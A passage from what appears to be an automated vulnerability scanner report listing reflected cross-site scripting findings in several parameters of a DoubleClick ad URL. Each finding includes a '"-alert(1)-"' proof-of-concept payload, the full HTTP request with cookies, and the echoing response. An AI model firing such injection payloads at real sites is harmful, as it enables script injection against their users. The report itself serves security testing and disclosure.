736528/41754315/1%3B%3B%7Esscs%3D%3fhttp://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA463451"-alert(1)-"7fbc9de3120&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh
...[SNIP]...

6.14. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [ciu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the ciu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eea1f"-alert(1)-"dded19aba00 was submitted in the ciu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQeea1f"-alert(1)-"dded19aba00&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:22:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7522

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQeea1f"-alert(1)-"dded19aba00&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=http%3a%2f%2fwww.newark.com/jsp/besp
...[SNIP]...

6.15. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [dm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the dm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e8a4"-alert(1)-"b53d4116977 was submitted in the dm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=3e8a4"-alert(1)-"b53d4116977&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:22:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7570

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
zI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=3e8a4"-alert(1)-"b53d4116977&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=http%3a%2f%2fwww.newark.com/jsp/bespoke/bespoke7.jsp%3Fbespokepage%3Dcommon/en/technology-first/whats-new/whats-new.jsp%26CMP%3DBAN-L0-Discrete");
var fscUrl = u
...[SNIP]...

6.16. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [dv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the dv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 762cb"-alert(1)-"41ac094a1d2 was submitted in the dv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=762cb"-alert(1)-"41ac094a1d2&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:22:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7522

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
DAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=762cb"-alert(1)-"41ac094a1d2&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=http%3a%2f%2fwww.newark.com/jsp/bespoke/bespoke7.jsp%3Fbespokepage%3Dcommon/en/technology-first/whats-new/whats-new.jsp%26CMP%3DBAN-NPI_np");
var fscUrl = ur
...[SNIP]...

6.17. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [ei parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the ei request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8637"-alert(1)-"c1532cc59a4 was submitted in the ei parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORKe8637"-alert(1)-"c1532cc59a4&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:21:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7522

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
ape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af3/f/1c8/%2a/b%3B240097157%3B0-0%3B0%3B63021589%3B2321-160/600%3B41736528/41754315/1%3B%3B%7Esscs%3D%3fhttp://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORKe8637"-alert(1)-"c1532cc59a4&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MF
...[SNIP]...

6.18. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [epid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the epid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70e88"-alert(1)-"9bf5214f7d4 was submitted in the epid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=70e88"-alert(1)-"9bf5214f7d4&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:22:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7522

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=70e88"-alert(1)-"9bf5214f7d4&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=http%3a%2f%2fwww.newark.com/jsp/bespoke/be
...[SNIP]...

6.19. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [euid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the euid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39457"-alert(1)-"015accc670f was submitted in the euid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn39457"-alert(1)-"015accc670f&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 16:21:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
Dv8/3af3/f/1c8/%2a/o%3B240097157%3B3-0%3B0%3B63021589%3B2321-160/600%3B41753994/41771781/1%3B%3B%7Esscs%3D%3fhttp://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn39457"-alert(1)-"015accc670f&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.re
...[SNIP]...

6.20. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [fiu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4860.158901.DATAXU/B5300325.14

Issue detail

The value of the fiu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 622a9"-alert(1)-"8932fa1c614 was submitted in the fiu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

